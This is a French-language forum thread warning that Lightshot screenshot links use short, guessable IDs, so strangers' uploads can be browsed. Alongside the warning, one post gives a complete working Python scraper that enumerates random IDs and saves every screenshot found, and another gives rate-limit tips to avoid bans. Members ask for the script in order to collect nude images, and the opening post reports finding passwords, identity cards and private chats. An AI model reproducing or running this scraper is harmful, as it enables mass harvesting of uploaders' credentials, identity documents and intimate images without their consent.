N'uploadez rien de délicat sur Lighshot !

jdev · 8 Juin 2018

Bonjour à tous,

Je vais essayer d'être au plus clair et concis.

Je pense que vous connaissez pratiquement tous Lighshot, application pour créer des captures d'écrans et les partager. Elle permet en effet d'uploader automatiquement sur ses serveurs des captures écran pour les partager en ligne via leur service
Vous devez être inscrit pour voir les liens ! Inscrivez-vous ou connectez-vous ici.
.

Jusque là, tout va bien me direz-vous, mais si vous êtes attentif, les screenshots se retrouvent sur une URL publique comme :
Vous devez être inscrit pour voir les liens ! Inscrivez-vous ou connectez-vous ici.
ou encore
Vous devez être inscrit pour voir les liens ! Inscrivez-vous ou connectez-vous ici.

Vous devez être inscrit pour voir les liens ! Inscrivez-vous ou connectez-vous ici.

Chaque URL est composé d'une chaîne alphanumérique séquencielle de 5-6 caractères, et il est donc très simple d'aller observer les screens des autres...

Merci à Naïm Gallouj d'avoir mis en lumière ce soucis.

J'ai donc codé un petit script me permettant d'enregistrer dans un dossier tout une séquence de screens allant par exemple de aaa000...baa000 à zzz999 (ce qui fait un bon paquets de photos, j'ai stopper le programme avant la fin...).
Et c'est comme ça que j'ai pu apercevoir beaucoup ~~de merd~~ de screens sans intérêt comme des captures d'écrans de jeux-vidéos ou bien des sites russes.. mais j'y ai aussi trouvé un bon nombre d'IP, de cartes d'identités/crédits, d'adresses mail gentiment suivies de mots de passe, de conversations personnelles (Facebook, Skype, Steam...), d'images de filles dénudées.. et j'en passe.

Tout ça pour prévenir de faire attention à ce que vous uploadez sur ce site.

Merci de votre attention ?

Ashuz · 8 Juin 2018

j'étais au courant de cette technique perso, en même temps en y réfléchissant ce n'est pas tellement un secret. Cependant tout le monde n'y pense pas forcément donc bonne initiative de prévenir

Praxis' · 8 Juin 2018

Merci pour la prévention

Thomas · 8 Juin 2018

Merci pour avoir prévenu c'est sympa

Jaolish · 10 Juin 2018

Bonne astuce, les images se suppriment au bout d'un moment il me semble non ? je ne sais pas combien de jours par contre.

jdev · 10 Juin 2018

2LBC a dit:
Bonne astuce, les images se suppriment au bout d'un moment il me semble non ? je ne sais pas combien de jours par contre.

Oui il me semble aussi mais aucune idée non plus du temps ?

Djinh · 5 Juillet 2018

Merci de prévenir, je me disais aussi que les URL Lightshot pouvaient facilement être récupérer et nos données stockés étant donné que ce n'est que 6 caractères qui change.

ExoTiiKz SEC · 5 Juillet 2018

Merci pour la prévention

SziCx · 12 Juillet 2018

A savoir qu'il y a beaucoup d'autres sites avec lesquels la technique fonctionne aussi ! Ne jamais mettre n'importe quoi sur le web en règle générale.

Imam · 25 Juillet 2018

Leak les images des meufs, y’en a qui veulent voir >.<

Membre578448 · 21 Août 2018

Envoie le script on veux de la femelle xD

Rivals · 22 Août 2018

N’uploadez rien de sensible sur le web de manière générale

GARO-NORD · 25 Août 2018

Code:

#!/usr/bin/env python

import httplib2, sys, os, random, string

ENDLINE = '\033[0m'
BOLD = '\033[1m'
YELLOW = '\033[93m'
BLUE = '\033[94m'
GREEN = '\033[92m'
RED = '\033[91m'
GREYBACK = '\033[40m'

dirname = 'Lightshotr'

pngCount = 0
foundss = 0

def generateId(size=6):
    return ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(size))

def SavePic(content, ID, ext):
    f = open(dirname + '/' +str(ID) + ext,'wb')
    f.write(content)
    f.close

def PrintStatus(pngCount, link, COLOR):
    sys.stdout.write(BLUE + BOLD + '[+] ' + ENDLINE + str(pngCount) + ' Screenshots Found - ' + COLOR + BOLD + link + ENDLINE + '\r')
    sys.stdout.flush()

def Aborting():
    print '\n\n' + GREEN + BOLD + '[+]' + ENDLINE + ' All found Screenshots were saved to: ' + BOLD + os.getcwd() + '/' + dirname + ENDLINE + ' . Enjoy ;)\n'
    sys.exit()

print YELLOW + BOLD + '''

 ''' + ENDLINE + GREYBACK + YELLOW + BOLD + 'Author:' + ENDLINE + ' @xD4rker\n'

if not os.path.exists(dirname):
    os.makedirs(dirname)

while 1:

    try:

        COLOR = RED
        ID = generateId()
        link = 'http://prntscr.com/' + ID + '/direct'
        h = httplib2.Http(timeout=100)
        resp = h.request(link)

        if 'content-location' in resp[0]:
            pngUrl = resp[0]['content-location']
            ext = '.' + pngUrl[-3:]

            if (pngUrl != 'http://i.imgur.com/8tdUI8N.png') & (ext == '.png' or ext == '.jpg'):
                pngCount += 1
                SavePic(resp[1], ID, ext)
                COLOR = GREEN
            
        PrintStatus(pngCount, link, COLOR)

    except KeyboardInterrupt:
Aborting()

Membre578448 · 25 Août 2018

Ton code marche pas avec python normal ?

Karuma · 30 Août 2018

Yo foreal merci je savais pas :') Le nombre de truc louche que j'ai send à mes amis ahah

InitSys · 26 Septembre 2018

Je veux bien le script si jamais !

jdev a dit:
Bonjour à tous,

Je vais essayer d'être au plus clair et concis.

Je pense que vous connaissez pratiquement tous Lighshot, application pour créer des captures d'écrans et les partager. Elle permet en effet d'uploader automatiquement sur ses serveurs des captures écran pour les partager en ligne via leur service
Vous devez être inscrit pour voir les liens ! Inscrivez-vous ou connectez-vous ici.
.

Jusque là, tout va bien me direz-vous, mais si vous êtes attentif, les screenshots se retrouvent sur une URL publique comme :
Vous devez être inscrit pour voir les liens ! Inscrivez-vous ou connectez-vous ici.
ou encore
Vous devez être inscrit pour voir les liens ! Inscrivez-vous ou connectez-vous ici.

Vous devez être inscrit pour voir les liens ! Inscrivez-vous ou connectez-vous ici.
Chaque URL est composé d'une chaîne alphanumérique séquencielle de 5-6 caractères, et il est donc très simple d'aller observer les screens des autres...

J'ai donc codé un petit script me permettant d'enregistrer dans un dossier tout une séquence de screens allant par exemple de aaa000...baa000 à zzz999 (ce qui fait un bon paquets de photos, j'ai stopper le programme avant la fin...).
Et c'est comme ça que j'ai pu apercevoir beaucoup ~~de merd~~ de screens sans intérêt comme des captures d'écrans de jeux-vidéos ou bien des sites russes.. mais j'y ai aussi trouvé un bon nombre d'IP, de cartes d'identités/crédits, d'adresses mail gentiment suivies de mots de passe, de conversations personnelles (Facebook, Skype, Steam...), d'images de filles dénudées.. et j'en passe.

Tout ça pour prévenir de faire attention à ce que vous uploadez sur ce site.

Merci de votre attention ?

Et au passage, merci de citer la source qui est Korben

Florian. · 27 Septembre 2018

xD plutot pas mal

You must be registered for see images attach

InitSys · 28 Septembre 2018

J'ai trouvé un script qui faisait ça, et je me suis fait bannir car trop de request

Florian. · 29 Septembre 2018

ArtoxFR a dit:
J'ai trouvé un script qui faisait ça, et je me suis fait bannir car trop de request

Idem au début, tu es ban 48h du site jte conseil de faire 1 requête toute les 10s

Steve. · 29 Septembre 2018

Chaud quand même :0 merci d'avoir prévenu

N'uploadez rien de délicat sur Lighshot !

jdev

Membre

Ashuz

Praxis'

Thomas

Jaolish

Membre

jdev

Membre

Djinh

:)

ExoTiiKz SEC

SziCx

Imam

Membre578448

Rivals

GARO-NORD

Membre578448

Karuma

a soul in a temporary vessel

InitSys

Le chat noir

Florian.

InitSys

Le chat noir

Florian.

Steve.

https://discord.gg/XZwgnpWx4F